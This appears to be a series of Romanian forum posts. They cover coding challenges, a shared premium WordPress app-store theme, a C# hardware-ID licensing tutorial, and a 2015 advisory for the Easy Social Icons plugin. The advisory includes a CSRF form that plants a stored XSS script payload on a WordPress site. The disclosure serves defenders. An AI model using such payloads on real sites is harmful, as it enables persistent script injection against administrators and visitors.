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Propun o noua problema, una care poate parea putin mai ciudata, dar este destul de interesanta. Dat orice interval orar (ora de pe ceas, efectiv), acesta se poate converti in cuvinte din limbaj natural, sub forma urmatoare: Pentru o valoare a minutului data, asta inseamna (notat cu m) cand m = 0, atunci se foloseste o' clock cand 1 <= m <= 30, atunci se foloseste past cand m > 30, atunci se foloseste to Se cere scrierea unei functii care returneaza timpul dat sub forma de text, in limbaj natural, respectand regulile de mai sus. Ca input, se dau doua valori intregi si naturale, notam h si m, unde h reprezinta ora, iar m reprezinta minutul. Constrangeri 1 <= h <= 12 0 <= m < 60 Exemple Pentru h = 5 si m = 47, rezulta "thirteen minutes to six" Pentru h = 3 si m = 00, rezulta "three o' clock" Pentru h = 7 si m = 15, rezulta "quarter past seven" Limbajul care va fi folosit este la alegere libera. Sunt acceptate toate solutiile, indiferent de complexitatea timp, dar trebuie incercat sa se rezolve in O(1). O solutie personala va fi pusa ulterior. Spor!
Propun o noua problema care necesita o logica buna. Se da un array de numere intregi si pozitive. Singura alterare permisa a elementelor din array este incrementarea acestora, strict cu valoarea 1. Toate numerele din array trebuie sa devina pare, intr-un final, cu un numar minim de incrementari, dar respectand regula urmatoare: atunci cand se face o incrementare pe pozitia i din array, in mod obligatoriu se face incrementare fie pe pozitia i-1, fie pe pozitia i+1. Se cere returnarea numarului minim de incrementari, astfel incat, in final, toate numerele din array sa fie pare. In cazul in care input-ul nu este valid, deci nu se poate ajunge la un rezultat corect, se va returna -1. Constrangeri: Se considera N a fi numarul de elemente din array, iar 2 <= N <= 1000 1 <= V[i] <= 10, iar 0 <= i <= N-1 Exemplu #1: Se da V = [4,5,6,7]. Se face incrementare, la primul pas, pe i = 2 si respectiv i = 3, deci va rezulta array-ul V = [4,5,7,8]. Acum, la pasul urmator, se va face incrementare pe i = 1 si respectiv i = 2, deci va rezulta array-ul V = [4,6,8,8]. In final, se intoarce numarul de incrementari facute, mai exact 4. Exemplu #2: Se da V = [2,3,4,5,6]. Se face incrementare, la primul pas, pe i = 1 si respectiv i = 2, deci va rezulta array-ul V = [2,4,5,5,6]. Acum, la pasul urmator, se va face incrementare pe i = 2 si respectiv i = 3, deci va rezulta array-ul V = [2,4,6,6,6]. In final, se intoarce numarul de incrementari facute, mai exact 4. Exemplu #3: Se da V = [1,2]. Oricum s-ar face incrementare, una dintre valori va fi mereu para, iar cealalta impara. Prin urmare, nu se poate ajunge la un rezultat corect, deci se intoarce -1. Limbajul care va fi folosit este la alegere libera. Sunt acceptate toate solutiile, indiferent de complexitatea timp, dar trebuie incercat sa se rezolve in maxim O(N). O solutie personala va fi pusa ulterior. Spor!
De data aceasta, propun un challenge care nu necesita prea multe cunostinte in structuri de date, ci o logica buna. O definitie necesara: In matematica, un numar Kaprekar, pentru o baza data, este un numar intreg si pozitiv, al carui valoare ridicata la patrat, in aceeasi baza, poate fi impartita in doua bucati, iar suma numerelor din aceste doua bucati rezulta efectiv in numarul original. Numarul se imparte in doua parti egale (sau +1 la una dintre parti, atunci cand este un numar impar de cifre), nu se fac "variante". Exemplu: 45 este un numar care respecta regula (numar Kaprekar), deoarece 45² = 2025 si 20+25 = 45. Alte exemple: 9 respecta regula, deoarece 9² = 81 si 8+1 = 9; 297 respecta regula, deoarece 297² = 88209 si 88 + 209 = 297. ATENTIE: Aceasta nu reprezinta definitia oficiala in totalitate, este o variatie, problema trebuie rezolvata pe baza la ce se spune aici. A se observa ca in ultimul exemplu, numarul ridicat la patrat se imparte intr-o bucata de lungime doi si celalalta de lungime trei, deoarece are un numar impar de cifre, fata de cazurile in care ar fi un numar par de cifre. De asemenea, trebuie avut grija, daca una dintre cele doua bucati incepe cu un 0. Se dau doua numere intregi, p si q, si se cere sa se afiseze toate numerele Kaprekar din respectivul interval (inclusiv p si q); 0 < p < q < 100000 Exemplu: p = 1, q = 100; se va afisa "1 9 45 55 99", acestea fiind numerele care respecta regula. Limbajul care va fi folosit este la alegere libera. Solutiile cu complexitate timp mai mare decat O(N) sunt respinse. O solutie personala va fi pusa ulterior. Spor!
Filip – IOS App Store v.2.0.1200 Premium Wordpress Theme for Affiliate IOS App from Itune About IOS App Store: Flip IOS App Store Premium Wordpress theme allow you build ios app store like Google Play, Itune App Store .... It is full automatic. No need maintain. Flip IOS App Store Features: Itune Affiliate Integration IOS App Store Theme integrate affiliate application of Itune. You can use your itune affiliate id in your website. If you don’t have itune affiliate, you can signup it easy. Import Genres As Category You can import genres of itune affiliate as category to your website with one click. By this way, you will save your time when create application category for your website. Easy Features Category You can manager feature category of your website, you can choose any category as feature in category option panel. Automatic Import App Application feeds will automatic import to your website. You can choose your location, import cycle, feed type, … and how many items will import to your website. If you don’t want automatic import, you can turn it off. Target Import App You can import ios application to your website from your keyword. Just enter keyword, search and publish it. Mobile Ready Our themes support all morden device includes: iphone, ipad, android, … your visitor can use any device to visitor to your website. Custom Background You can change background of header, footer, or website background. With our themes, you change it very easy in Theme Option Panel. You can upload a images, change color, … Unlimit Sidebars With our themes. you to create an unlimited number of sidebars from the Sidebar Control Panel. It allows you to assign a custom sidebar to every single page, archive or index. And you can always use the default ones as well Compatible with all browsers. Our themes are compatible with the most popular internet browsers. It’s important that your website performs well for everyone that visits it. Themed Login & Signup Pages We don’t use default login page and register page of wordpress. Our themes have a separate login page and register page. It makes your website more friendly and easier to use. Google Analytics Google analytics or other tracking code can easy put to your website in theme option panel. Tracking Code With our themes have panel option help you add tracking code for each page, post in your website. It helps you easily manage visitors to your website. And find better marketing solution for your websites. Easy change layout By default, we are intergate best layout for your website. However, you can change layout of your website in theme option panel with one click. Search Engine Optimized With our themes, You will don’t need install plugins. SEO is include in our themes. You can easy add meta tags, keywords, … for each page. or It will auto generate for your post, page and other page. Ease change Logo, favicon You can easy upload favicon, logo. Change logo position on your website … Auto-Updates Our themes will auto check new version and update for your website. New version will notify in admin control panel or email to your email. You can choose install automatic mode or manual mode. Easy Description By default, wordpress will use top of content in your post, or page or post expert(if theme support it). But, with our themes, you can custom description fo your post, page. You can choose any content you like. Page Options Different with others themes, you can choose to hide or display the title, author, categories, tags, … of each page, post, … You can do it very easy in Post Panel. Easy Sidebar Control With our themes, you can control layout of each sidebar. You can select layout for sidebar, turn on or off it. … Unlimited Font Our themes includes support all Google fonts, you can use any font of Google Font you like. If you don’t want use google fonts. You can upload your own font to your website. It is very easy to do in Font Panel. HTML5 / CSS3 We believe modern WordPress themes should be using modern technologies. Every theme in our catalogue is based on HTML5 / CSS3 (progressively). DEMO: Top App for iPhone, IPad - IOS App Store - Top App for iPhone, IPad - IOS App Store Theme Page: Filip - IOS App Store - Download: - Google Drive
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Dear, I want to share you a profession wordpress theme, you can download and use it for create a app store like google play, itune store. Screenshot I Hope this share will help some body need it. Theme Features Itune Affiliate Integration Import Genres As Category Easy Features Category Automatic Import App Target Import App Mobile Ready Custom Background Unlimit Sidebars Compatible with all browsers. Themed Login & Signup Pages Google Analytics Tracking Code Easy change layout Search Engine Optimized Ease change Logo, favicon Auto-Updates Easy Description Page Options Easy Sidebar Control Unlimited Font HTML5 / CSS3 DEMO: Top App for iPhone, IPad - IOS App Store - Top App for iPhone, IPad - IOS App Store Theme Page: Filip - IOS App Store - Download: suuappstore-v2.0.1000
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==================================================== Product: Easy Social Icons WordPress plugin Vendor: CyberNetikz Tested Version: 1.2.2 Vulnerability Type: XSS [CWE-79] and CSRF [CWE-352] Risk Level: Medium Solution Status: Solved in version 1.2.3 Discovered and Provided: Eric Flokstra - ITsec Security Services ==================================================== [-] About the Vendor: Easy Social Icons is a WordPress plugin and can be used to set icons on the public page in order to link to social media platforms such as LinkedIn, Twitter or Facebook. [-] Advisory Details: It is discovered that insufficient validation is performed on the 'image_file' parameter enabling arbitrary JavaScript to be injected. On top of that no random tokens are used to prevent CSRF attacks. By combining these vulnerabilities an attacker could for example trick an admin into setting a persistent XSS payload on the public WordPress page. [-] Proof of Concept: <html> <body> <form action="" <> method="POST" enctype="multipart/form-data"> <input type="hidden" name="title" value="Example" /> <input type="hidden" name="image_file" value=""><script>alert(1)</script>" /> <input type="hidden" name="url" value="" /> <input type="hidden" name="sortorder" value="0" /> <input type="hidden" name="target" value="1" /> <input type="hidden" name="action" value="edit" /> <input type="hidden" name="id" value="1" /> <input type="hidden" name="submit_button" value="Save Changes" /> <input type="submit" value="Submit request" /> </form> </body> </html> [-] Disclosure Timeline: [02 Feb 2015]: Vendor notification [02 Feb 2015]: Vulnerability confirmation [11 Feb 2015]: Vulnerability patched [19 Feb 2015]: Public disclosure [-] Solution: Update to the latest version of Easy Social Icons. [-] References: [1] Easy Social Icons Changelog -- [2] Common Weakness Enumeration (CWE) -- [3] ITsec Security Services BV -- ------------------------------------------------------------------------ ITsec Security Services bv. (KvK. 34181927) Postal Address: P.O. Box 5120, 2000GC Haarlem Visitors Address: Kenaupark 23, 2011 MR Haarlem Phone: +31 - (0)23 542 05 78 The information contained in this email communication is confidential and is intended solely for the use of the individual or entity to whom it is addressed and others authorized to receive it. If you are not the intended recipient, you are hereby notified that any disclosure, copying,distribution, or taking any action in reliance of the contents of this information is strictly prohibited and may be unlawful. No rights may be attached to this message. ITsec does not accept any liability for incorrect and incomplete transmission or delayed receipt of this e-mail nor for the effects or damages caused by the direct or indirect use of the information or functionality provided by this posting, nor the content contained within.Use them at your own risk. Source
b4851530bf94c673d92cadf5c156d8bd Super simplu! Dati si o sansa sa incepatori!
This tutorial will explain the basics of generating and verifying of HWID's. First things first, "What the hell is a HWID??" Most of you already know this so I will keep it short. Ever since Windows XP Product Activation came around, when the OS is installed an unique ID is generated for the basic hardware components in the system. This ensures that a software will be bound to those unique ID, so it can't be moved/run on other machines. Of course there are methods to bypass this, but this is not the scope of this tutorial. Also to make it more "secure" we will be using the triple DES algorithm to crypt the generated CPU and HDD Id's. A short overview: The class will be called Hwid and will contain 2 properties(CpuId,HddId plain text), Generate, Verify and EncryptString methods. The Verify method takes 2 parameters: password(used for DES) and path. The path can be also an URL to a website hosting the file with the HWID's. The void Main() contains a simple console application to see how Hwid class works. The code is commented and self explanatory I would say. Source code: hg clone Hwid class class Hwid { private string _cpuId = string.Empty; private string _hddId = string.Empty; public Hwid() { _cpuId = GetCpuId(); _hddId = GetHddId("C"); } /// <summary> /// Gets first CPU unique ID /// </summary> /// <returns></returns> private string GetCpuId() { ManagementClass cpuManager = new ManagementClass("win32_processor"); ManagementObjectCollection cpuCollection = cpuManager.GetInstances(); foreach (ManagementObject cpu in cpuCollection) { // Return first CPU Id return cpu.Properties["processorID"].Value.ToString(); } return string.Empty; } /// <summary> /// Gets the drives unique ID /// </summary> /// <param name="drive">Drive name(eg: C,D..)</param> /// <returns></returns> private string GetHddId(string drive) { ManagementObject dsk = new ManagementObject(@"win32_logicaldisk.deviceid=""" + drive + @":"""); dsk.Get(); return dsk["VolumeSerialNumber"].ToString(); } /// <summary> /// Encrypts the HWID using tripple DES algorithm /// </summary> /// <param name="Message">String to crypt</param> /// <param name="Passphrase">Password to use when crypting</param> /// <returns></returns> private string EncryptString(string Message, string Passphrase) ... /// <summary> /// Generates an encrypted HWID /// </summary> /// <param name="password">Password for the DES crypt algorith</param> /// <returns>Encrypted HWID</returns> public string Generate(string password) { return EncryptString(_cpuId + _hddId, password); } public string Generate(string password, string path) { try { string cryptedHwid = EncryptString(_cpuId + _hddId, password); // Write the crypted Hwid to file System.IO.StreamWriter file = new System.IO.StreamWriter(path); file.WriteLine(cryptedHwid); file.Close(); return cryptedHwid; } catch (Exception ex) { return ex.Message; } } /// <summary> /// Generates an encrypted HWID using the tripple DES algorithm /// </summary> /// <param name="password">Password for the DES crypt algorithm</param> /// <param name="path">Path where the HWID will be saved</param> /// <returns>Encrypted HWID</returns> public string Verify(string password, string path) { try { string db = string.Empty; if (path.Contains("http")) { WebClient webClient = new WebClient(); db = webClient.DownloadString(path); webClient.Dispose(); } else { System.IO.StreamReader file = new System.IO.StreamReader(path); db = file.ReadToEnd(); file.Close(); } if (db.Contains(EncryptString(_cpuId + _hddId, password))) return "HWID OK"; else return "HWID NOT FOUND"; } catch (Exception ex) { return ex.Message; } } void Main() static void Main(string[] args) { Hwid hwid = new Hwid(); // Change this to your desired password; string password = "secret1234"; if (args.Length < 1) PrintHelp(); else switch (args[0]) { case "--display": { Console.WriteLine("CPU ID: " + hwid.CpuId); Console.WriteLine("HDD ID: " + hwid.HddId); Console.WriteLine(); break; } case "--generate": { if (args.Length < 2) { Console.WriteLine("Path not specified!"); break; } string path = args[1]; Console.WriteLine("Encrypted HWID: " + hwid.Generate(password, path)); // If we don't specify the path it will only return the encrypted string //Console.WriteLine("Encrypted HWID: " + hwid.Generate(password)); break; } case "--verify": { if (args.Length < 2) { Console.WriteLine("Path not specified!"); break; } string path = args[1]; Console.WriteLine(hwid.Verify(password, path)); break; } default: { PrintHelp(); break; } } Console.WriteLine("Press any key to continue . . ."); Console.ReadLine(); }